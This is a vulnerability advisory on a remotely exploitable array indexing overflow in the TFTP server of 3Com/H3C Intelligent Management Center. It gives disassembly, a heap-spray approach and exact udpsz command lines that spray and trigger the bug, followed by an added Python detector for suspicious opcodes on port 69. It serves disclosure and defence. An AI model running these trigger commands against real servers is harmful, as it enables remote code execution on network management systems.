#######################################################################

Luigi Auriemma

Application:  3com / H3C Intelligent Management Center (IMC)
              http://www.3com.com/IMC_Enterprise/
Versions:     <= 3.3 SP2 R2606P13
Platforms:    Windows, Linux, Solaris
Bug:          array indexing overflow in tftpserver.exe
Exploitation: remote, versus server
Date:         probably found 19 Oct 2010
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

"3Com® Intelligent Management Center (IMC) Enterprise Edition is a
self-contained comprehensive management solution, flexible and scalable
enough to meet the needs of advanced Enterprise networks."

The suite is also known under the vendors HP and H3C (the original
developer).

#######################################################################

======
2) Bug
======

tftpserver.exe is a TFTP service running on UDP port 69 and available
in the default configuration of IMC.

The service is affected by an array indexing overflow in the function
that selects the address of the function to execute for handling the
specific opcode of the packet.

The opcode is a 16bit number, and the memory from which the function
pointer is taken is dynamically allocated heap memory (it grows with
time and with the number of connections) that the attacker can "spray"
with his data by sending various packets before the one used for
triggering the bug, allowing him to execute code:

  00404F74  |. 8B10            MOV EDX,DWORD PTR DS:[EAX]          <= EDX is the 16bit opcode
  00404F76  |. 8B4491 FC       MOV EAX,DWORD PTR DS:[ECX+EDX*4-4]
  ...
  00402847  |. 8B16            MOV EDX,DWORD PTR DS:[ESI]          <= ESI controlled
  00402849  |. 8B52 04         MOV EDX,DWORD PTR DS:[EDX+4]
  0040284C  |. 8D85 90FDFFFF   LEA EAX,DWORD PTR SS:[EBP-270]
  00402852  |. 50              PUSH EAX
  00402853  |. 51              PUSH ECX
  00402854  |. 57              PUSH EDI
  00402855  |. 8BCE            MOV ECX,ESI
  00402857  |. C645 FC 01      MOV BYTE PTR SS:[EBP-4],1
  0040285B  |. FFD2            CALL EDX

#######################################################################

===========
3) The Code
===========

http://aluigi.org/testz/udpsz.zip

  udpsz -x 4 -l 10 -C "0003 00 00" -b 0x61 SERVER 69 500
  udpsz -C "0100 00 00" -b 0x61 SERVER 69 1024

The index 0x0100 is only an example.

Note that the function 00401380 takes the 16bit opcode from the packet
in a "signed" way, so if the lower 8bit value of the opcode is greater
than 0x80 it's needed to add 0x0100 to the desired opcode (for example
0xcb88 is read by the service as 0xca88, while 0xcb78 is read
correctly).

#######################################################################

======
4) Fix
======

http://www.zerodayinitiative.com/advisories/ZDI-11-165

#######################################################################
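An added example, not part of the original advisory or of udpsz, showing the defender's view of the packets described in sections 2 and 3: it classifies payloads arriving on UDP port 69 by opcode (DATA packets on the listening port, as used for the spray, and opcodes outside the 1..6 handler table, as used for the overflow) and models the signed low-byte decode of section 3 as a labelled reconstruction. The sample payloads are constructed, not captured traffic.

```python
import struct

# Opcodes defined by RFC 1350 (1-5) and RFC 2347 (6, OACK).
VALID_OPCODES = {1: "RRQ", 2: "WRQ", 3: "DATA", 4: "ACK", 5: "ERROR", 6: "OACK"}
# Only requests are legitimately sent to the well-known port 69;
# every other opcode belongs to an established transfer on a TID port.
REQUEST_OPCODES = {1, 2}


def opcode_as_read_by_service(payload: bytes) -> int:
    """Reconstruction (assumption) of the flawed decode the advisory describes:
    the low byte is sign-extended before being combined with the high byte,
    so 0xcb88 is seen as 0xca88 while 0xcb78 is decoded correctly."""
    hi, lo = payload[0], payload[1]
    lo_signed = lo - 0x100 if lo >= 0x80 else lo
    return ((hi << 8) + lo_signed) & 0xFFFF


def inspect_tftp_on_port_69(payload: bytes) -> dict:
    """Classify one UDP payload received on port 69.

    ok         - RRQ/WRQ, the only opcodes expected on the listening port
    unexpected - a valid opcode that belongs on a transfer port, not 69
                 (the advisory's heap spray sends DATA packets this way)
    suspicious - opcode outside 1..6, i.e. a table index the dispatcher
                 has no handler for (the advisory's array indexing overflow)
    malformed  - too short to carry an opcode
    """
    if len(payload) < 2:
        return {"verdict": "malformed", "opcode": None}
    opcode = struct.unpack("!H", payload[:2])[0]
    if opcode in REQUEST_OPCODES:
        return {"verdict": "ok", "opcode": opcode, "name": VALID_OPCODES[opcode]}
    if opcode in VALID_OPCODES:
        return {"verdict": "unexpected", "opcode": opcode, "name": VALID_OPCODES[opcode]}
    return {"verdict": "suspicious", "opcode": opcode,
            "as_read_by_service": opcode_as_read_by_service(payload)}


# Constructed sample payloads (not captured traffic).
SAMPLES = {
    "rrq":     b"\x00\x01config.cfg\x00octet\x00",
    "spray":   b"\x00\x03\x00\x00" + b"a" * 12,   # DATA block 0, 0x61 filler
    "trigger": b"\x01\x00\x00\x00" + b"a" * 12,   # opcode 0x0100 from the advisory
    "signed":  b"\xcb\x88\x00\x00",               # decoded as 0xca88 by the flawed reader
}

if __name__ == "__main__":
    for label, payload in SAMPLES.items():
        print(label, inspect_tftp_on_port_69(payload))
```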